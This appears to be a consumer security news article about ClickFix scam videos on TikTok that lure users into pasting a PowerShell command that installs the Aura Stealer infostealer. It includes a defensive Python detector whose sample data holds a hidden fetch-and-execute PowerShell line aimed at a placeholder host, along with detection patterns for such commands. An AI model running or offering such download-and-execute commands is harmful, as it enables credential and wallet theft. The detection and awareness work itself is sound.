Beware of TikTok Tricks: Hackers Hijack Videos to Scam You and Steal Your Data

October 29, 2025


Facebook, YouTube, and now TikTok: these platforms are a treasure trove of potential targets for cybercriminals. Cybersecurity researchers have uncovered several TikTok videos that disguise attacks belonging to the ClickFix malware campaign. Here’s how to safeguard yourself.

Social media platforms are a goldmine for hackers in search of new targets. Earlier this year, cybersecurity experts detected a malvertising campaign that initially exploited Meta’s advertising platforms with bogus offers for free access to TradingView Premium, later moving to YouTube and Google Ads.

However, dear TikTok users, your favorite platform is not without risks either. Cybersecurity experts, including Trend Micro and Xavier Mertens, have identified videos instructing users on how to “activate” popular software like Adobe Premiere, Microsoft 365, and Windows, as well as non-existent bundles like Spotify or Netflix. These are actually instructions to execute malicious commands.

ClickFix Malicious Campaigns Now Targeting TikTok

The campaign employs the ClickFix method, a scam technique known since the early 2000s, which now has a variant called FileFix. This recent proof of concept is used by hackers to drain your sensitive data through the simple act of copying/pasting a fake Facebook link.

Initially, this scam technique involved convincing the user that their PC had an issue and offering a “quick and easy solution.” Today, it takes various forms, according to our colleagues at TechRadar: exclusive offers, supposedly locked documents, or, as in this case, software activators.

In each case, the user is tricked into copying and pasting a command into the Windows Run dialog. However, this command is a malicious PowerShell script that downloads and executes the Aura Stealer spyware, designed to steal stored browser passwords, user credentials, cryptocurrency wallet data, and authentication cookies. According to Mertens, the ClickFix code downloads another piece of malware, but its purpose remains unclear at the moment.
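A defender-side check for the paste-into-Run step described above, added here as an example and not taken from the researchers cited: it scores Run-dialog history values (the per-user RunMRU registry key, where Windows stores each entry with a trailing `\1`) for PowerShell launches that fetch remote content, evaluate a string as code, hide their window, or pass an encoded command. The sample values, the host name and the heuristics are constructed for illustration.

```python
import re

# Constructed sample of Run-dialog history values, as exported from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"\\fileserver\share\1",
    r"powershell -w hidden -c iex (irm https://activate.example.invalid/x)\1",
    r"cmd /c start /min powershell -nop -enc <BASE64-PLACEHOLDER>\1",
    r"powershell\1",  # opening a console alone is not a signal
]

INTERPRETER = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)

# Heuristic signals (assumptions for this example, not a vendor rule set).
SIGNALS = {
    "fetches remote content": re.compile(
        r"https?://|\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    "executes a string as code": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # -w / -win / -WindowStyle followed by Hidden (or its numeric form 1)
    "hidden window": re.compile(r"(?<!\S)-w(i\w*)?\s+(h\w*|1)\b", re.I),
    # -e / -ec / -enc / -EncodedCommand, but not -ep / -ExecutionPolicy
    "encoded command": re.compile(r"(?<!\S)-e(c|nc?\w*)?\s+\S", re.I),
}

def score_run_entry(value):
    """Return (command, reasons); reasons is empty when nothing stands out."""
    command = value[:-2] if value.endswith("\\1") else value
    if not INTERPRETER.search(command):
        return command, []
    return command, [name for name, rx in SIGNALS.items() if rx.search(command)]

def suspicious_entries(values):
    """Keep only the entries that raised at least one signal."""
    scored = (score_run_entry(v) for v in values)
    return [(cmd, reasons) for cmd, reasons in scored if reasons]

if __name__ == "__main__":
    for cmd, reasons in suspicious_entries(SAMPLE_RUNMRU):
        print(f"[!] {cmd}\n    -> {', '.join(reasons)}")
```

A hit here means a user typed or pasted the command into Run themselves, which is the behaviour these videos ask for, so it is worth following up with the user even when the download was blocked.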

To protect yourself from ClickFix attacks, here are some recommendations:

  • Avoid clicking on links from emails or websites.
  • Always use official websites and legitimate software.
  • Regularly update your devices and software.
  • Install an antivirus and an ad blocker.
  • Be cautious about the permissions sites or apps may ask for.

Two key takeaways from the various malicious campaigns identified by experts: if you’re asked to act “urgently,” it’s often a sign that there is no real urgency—only a trap; and if something seems too good to be true, it probably is.
